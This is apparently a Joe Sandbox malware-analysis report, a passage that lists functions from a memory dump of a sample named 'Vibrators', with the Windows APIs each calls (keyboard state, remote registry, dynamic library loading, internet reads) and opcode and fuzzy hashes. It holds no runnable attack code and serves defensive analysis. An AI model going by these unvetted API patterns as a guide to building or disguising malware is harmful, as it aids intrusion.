Instruction ID: 5c0c4a8b4b03e6420c0a698f75a3e8c5e7b7d4b9600fde51073f1a154a6255ab
Opcode Fuzzy Hash: e6d810c83055aae3d81a58ee3316544e8d2f4573bb0987594dad6edae1971b2e
Instruction Fuzzy Hash: BEB15E72D00119ABDF11DBA4CD85EEEBBBDEF48350F1040AAF609E7151EA349B458F61

Function 00A7ADE7 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00A7AE87
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00A7AE95
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00A7AEC8
CloseHandle.KERNEL32(?), ref: 00A7B09D

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: 0e8cb8359fbc951ec502474d72e833af31ed4b0d22da32f61aaf8ad695a14307
Instruction ID: f2865c20a05b5563ed831ade6ec7d5bf295fd388e0b484674c45ddc779118dbb
Opcode Fuzzy Hash: 0e8cb8359fbc951ec502474d72e833af31ed4b0d22da32f61aaf8ad695a14307
Instruction Fuzzy Hash: CBA18EB1A04301AFE720DF24C886B2AB7E5AF84724F54C85DF599DB2D2DB71EC418B91

Function 00A7C429 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 009FB329: _wcslen.LIBCMT ref: 009FB333

Part of subcall function 00A7D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A7C10E,?,?), ref: 00A7D415
Part of subcall function 00A7D3F8: _wcslen.LIBCMT ref: 00A7D451
Part of subcall function 00A7D3F8: _wcslen.LIBCMT ref: 00A7D4C8
Part of subcall function 00A7D3F8: _wcslen.LIBCMT ref: 00A7D4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A7C505
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A7C560
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00A7C5C3
RegCloseKey.ADVAPI32(?,?), ref: 00A7C606
RegCloseKey.ADVAPI32(00000000), ref: 00A7C613

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: 71ca9e7cc56e1259b4819b8160362685b916fff2eefcdabf0312ec0561aeccc6
Instruction ID: fff127b3c9488a75659505e18d649de255365f0d4f35e6b43434e908760beb4b
Opcode Fuzzy Hash: 71ca9e7cc56e1259b4819b8160362685b916fff2eefcdabf0312ec0561aeccc6
Instruction Fuzzy Hash: 8E618C71208245AFC714DF24C890E2ABBE5FF84318F54C59CF19A8B292DB31ED46CB92

Function 00A5ED12 Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00A5E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00A5D7CD,?), ref: 00A5E714

Part of subcall function 00A5E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00A5D7CD,?), ref: 00A5E72D

Part of subcall function 00A5EAB0: GetFileAttributesW.KERNEL32(?,00A5D840), ref: 00A5EAB1

lstrcmpiW.KERNEL32(?,?), ref: 00A5ED8A
MoveFileW.KERNEL32(?,?), ref: 00A5EDC3
_wcslen.LIBCMT ref: 00A5EF02
_wcslen.LIBCMT ref: 00A5EF1A
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00A5EF67

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: c46e853d3352fe01d4d850b0801a638c1a2d54ea9c37d8d2cf2f4bb3831ec280
Instruction ID: 1d8348c60f464c1ea8a8266055908abbd4b17509221a60c3f1d2f7ecf70cd353
Opcode Fuzzy Hash: c46e853d3352fe01d4d850b0801a638c1a2d54ea9c37d8d2cf2f4bb3831ec280
Instruction Fuzzy Hash: 535161B25083849BC724EBA4D9919DBB3ECEF84351F00092EF689D3191EF71A68CC756

Function 00A59517 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00A59534
VariantClear.OLEAUT32 ref: 00A595A5
VariantClear.OLEAUT32 ref: 00A59604
VariantClear.OLEAUT32(?), ref: 00A59677
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00A596A2

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 2f38918463879d1e255468b0ee9051321e3a2c0fb2632912019cd5cff6df72d0
Instruction ID: bbdd967dab2a5c3e76b4cb9d5a5d73023a007601428e43fe6b6cf533bbd8a9a5
Opcode Fuzzy Hash: 2f38918463879d1e255468b0ee9051321e3a2c0fb2632912019cd5cff6df72d0
Instruction Fuzzy Hash: 575147B5A00219EFCB14CF68C884EAAB7F9FF88310B158559E909DB350E730E915CF90

Function 00A69540 Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00A695F3
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00A6961F
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00A69677
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00A6969C
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00A696A4

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: de56b7ee69c3bf54c03f0dd2d112174889f94b5477d7371c9a585707002e1cc8
Instruction ID: d34340240505a239b5e5d9409ddd6966066809526241773ea64c7c94dd3555fa
Opcode Fuzzy Hash: de56b7ee69c3bf54c03f0dd2d112174889f94b5477d7371c9a585707002e1cc8
Instruction Fuzzy Hash: 8B513D75A00219AFDF05DF54C885EAABBF5FF49314F048058E949AB3A2DB35ED41CB90

Function 00A79941 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 00A7999D
GetProcAddress.KERNEL32(00000000,?), ref: 00A79A2D
GetProcAddress.KERNEL32(00000000,00000000), ref: 00A79A49
GetProcAddress.KERNEL32(00000000,?), ref: 00A79A8F
FreeLibrary.KERNEL32(00000000), ref: 00A79AAF

Part of subcall function 00A0F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00A61A02,?,75B8E610), ref: 00A0F9F1
Part of subcall function 00A0F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00A50354,00000000,00000000,?,?,00A61A02,?,75B8E610,?,00A50354), ref: 00A0FA18

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: 469e8f3498c2b112dd01ba55b9d26f37e3d8f92ceca1765ef407f28965a89787
Instruction ID: 4074a41ec0dc6c290704f3f3442936ec479e4f062893e2a10b265e6720f0e97f
Opcode Fuzzy Hash: 469e8f3498c2b112dd01ba55b9d26f37e3d8f92ceca1765ef407f28965a89787
Instruction Fuzzy Hash: A8515C35601209DFCB10DF68C485DAABBB0FF49354B14C1A9E90AAB762D731ED86CB81

Function 00A875AE Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 00A8766B
SetWindowLongW.USER32(?,000000EC,?), ref: 00A87682
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00A876AB
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00A6B5BE,00000000,00000000), ref: 00A876D0
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00A876FF

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: 2d2220a6fd059d95eca53404edf59288363f54467b33711fc969ab1e5122864c
Instruction ID: f84a3c4f5ebebe8fde8e50bb33cadd44f3f28dc74d7752ac7cc690341c04bf0a
Opcode Fuzzy Hash: 2d2220a6fd059d95eca53404edf59288363f54467b33711fc969ab1e5122864c
Instruction Fuzzy Hash: EA41AC35A08504AFD725EF6CCC88FA97BA5FB4A360F250274F819A72E0E670ED51DB50

Function 009F19CD Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 009F19E1
ScreenToClient.USER32(00000000,?), ref: 009F19FE
GetAsyncKeyState.USER32(00000001), ref: 009F1A23
GetAsyncKeyState.USER32(00000002), ref: 009F1A3D

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: bd0e71d09fd15a57c236937b5a7c3d01f13e9ed2e495bf4adb6d398896957d41
Instruction ID: ce8487021b2daf621be1c10f06c315734721bffca2f15e109bf09d83debcfed2
Opcode Fuzzy Hash: bd0e71d09fd15a57c236937b5a7c3d01f13e9ed2e495bf4adb6d398896957d41
Instruction Fuzzy Hash: C8413D72A0810AFBDF15EF64C844BFEB774BB05324F20831AF529A2290D734AA54DB91

Function 00A642B9 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 00A64310
TranslateAcceleratorW.USER32(?,00000000,?), ref: 00A64367
TranslateMessage.USER32(?), ref: 00A64390
DispatchMessageW.USER32(?), ref: 00A6439A
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A643AB

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID:
API String ID: 2256411358-0
Opcode ID: 5297c6185a175c30c6e2b7e9ec090492ea735def8fee79c9f47199bd02d88938
Instruction ID: 10dfc249da4b9e2426b99979f91cc5dcac4af65252b44c7cf7e0999e818b8481
Opcode Fuzzy Hash: 5297c6185a175c30c6e2b7e9ec090492ea735def8fee79c9f47199bd02d88938
Instruction Fuzzy Hash: C331A870504346DFEB39DBB4D849FB73BB8EB09304F15456DD4A2CA2A0E7B49886CB25

Function 00A5224E Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00A52262
PostMessageW.USER32(00000001,00000201,00000001), ref: 00A5230E
Sleep.KERNEL32(00000000,?,?,?), ref: 00A52316
PostMessageW.USER32(00000001,00000202,00000000), ref: 00A52327
Sleep.KERNEL32(00000000,?,?,?,?), ref: 00A5232F

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: da953e142864f003d82efd9925ef1773e606978584c7369d678242fcb5be423e
Instruction ID: 18a4bc2257c6e958eacc0fd76a75bce554961fe2bf72b0c0dbdfb3ae4a22ac50
Opcode Fuzzy Hash: da953e142864f003d82efd9925ef1773e606978584c7369d678242fcb5be423e
Instruction Fuzzy Hash: D0319E75900219EFDB14CFA8CD89BDE3BB5FB05316F104225F925AB2D0D7709948DB90

Function 00A6D95F Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00A6CC63,00000000), ref: 00A6D97D
InternetReadFile.WININET(?,00000000,?,?), ref: 00A6D9B4
GetLastError.KERNEL32(?,00000000,?,?,?,00A6CC63,00000000), ref: 00A6D9F9
SetEvent.KERNEL32(?,?,00000000,?,?,?,00A6CC63,00000000), ref: 00A6DA0D
SetEvent.KERNEL32(?,?,00000000,?,?,?,00A6CC63,00000000), ref: 00A6DA37

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: 13e9de7c21a3e6052a4ab4c46ff408131188960bdd61460e9b73668eeb4cd354
Instruction ID: 2f9b97259582a720b94e9af707d2405fe5639b0ea2512c2b215c495fc0f5d76b
Opcode Fuzzy Hash: 13e9de7c21a3e6052a4ab4c46ff408131188960bdd61460e9b73668eeb4cd354
Instruction Fuzzy Hash: 1E316B72A04205EFDB20DFA5D884EAFBBF8EF14394B10442EE546D6550E730EE81DB60

Function 00A861A5 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 00A861E4
SendMessageW.USER32(?,00001074,?,00000001), ref: 00A8623C
_wcslen.LIBCMT ref: 00A8624E
_wcslen.LIBCMT ref: 00A86259
SendMessageW.USER32(?,00001002,00000000,?), ref: 00A862B5

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: fa37f55f445f3facdda4471a098210516987b308e8ace974d1cb97a8eca8521c
Instruction ID: 4eb8aa34bb74255cbcd42dca7d96d1b9e53280a500447dd63ac2aeeb9d105c96
Opcode Fuzzy Hash: fa37f55f445f3facdda4471a098210516987b308e8ace974d1cb97a8eca8521c
Instruction Fuzzy Hash: BB216275D002189AEB11EFA4CC84EEE7BB9FF44764F104256FA25EA1C0E7709985CF50

Function 00A7138D Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00A713AE
GetForegroundWindow.USER32 ref: 00A713C5
GetDC.USER32(00000000), ref: 00A71401
GetPixel.GDI32(00000000,?,00000003), ref: 00A7140D
ReleaseDC.USER32(00000000,00000003), ref: 00A71445

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 1218907ca3d6abe3b1c3243e8994fa5f3bf02e8a9a4d8e73d2c16b1cead87248
Instruction ID: 3ff32fb25c29bb2a34763e6a2599f8572f1339668b2a039763908e38ac0b64e4
Opcode Fuzzy Hash: 1218907ca3d6abe3b1c3243e8994fa5f3bf02e8a9a4d8e73d2c16b1cead87248
Instruction Fuzzy Hash: F4218436600208AFD704DF65DD84A6EB7F5EF44300B04C439E44AD7791DA70AD45DB90

Function 00A2D13D Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00A2D146
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A2D169

Part of subcall function 00A23B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00A16A79,?,0000015D,?,?,?,?,00A185B0,000000FF,00000000,?,?), ref: 00A23BC5

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00A2D18F
_free.LIBCMT ref: 00A2D1A2
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00A2D1B1

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 215073e2993677dc86967a8578fcc6dd20dfc7b509e7c417dc003048ffc468c9
Instruction ID: 7e668adcf0344898f8c0c024913b34b603ba11a79ee9ae5fa636fb8e1c2b81b8
Opcode Fuzzy Hash: 215073e2993677dc86967a8578fcc6dd20dfc7b509e7c417dc003048ffc468c9
Instruction Fuzzy Hash: 540171766056357F27217BAE6C8CD7B6A6EDEC2B613140239BD05CA685DA608D1282B0

Function 00A56078 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00A5608D
_memcmp.LIBVCRUNTIME ref: 00A560AB
_memcmp.LIBVCRUNTIME ref: 00A560BE
_memcmp.LIBVCRUNTIME ref: 00A560D6
_memcmp.LIBVCRUNTIME ref: 00A560EE

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: f617d0967253cbad36f0082d3d49cd2ae38918810194d922c668ed83a8617f94
Instruction ID: 8b9b13b3986e8da78942b7801663f6ca0df234a3445652e1fe2c8451204066e1
Opcode Fuzzy Hash: f617d0967253cbad36f0082d3d49cd2ae38918810194d922c668ed83a8617f94
Instruction Fuzzy Hash: D801B5F57003057B9A1066205D82FAB736DBE513D9B008421FE099B3C1E771ED58C6A1

Function 00A2316B Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(0000000A,?,?,00A1F64E,00A1545F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00A23170
_free.LIBCMT ref: 00A231A5
_free.LIBCMT ref: 00A231CC
SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00A231D9
SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00A231E2

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 9b1ffa2741b7305c9c3e2210f677a4452ba52c5c5eefd7d5591dab92fb6bf981
Instruction ID: a11d808c6a2347171a4c89d054b255a2228dd872bab1c08383c9cfdc51de3b23
Opcode Fuzzy Hash: 9b1ffa2741b7305c9c3e2210f677a4452ba52c5c5eefd7d5591dab92fb6bf981
Instruction Fuzzy Hash: 3801F9736406303B9E16677CBD46E2B166DEFC37717210738F815921D2EF29CA134211

Function 00A508FE Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

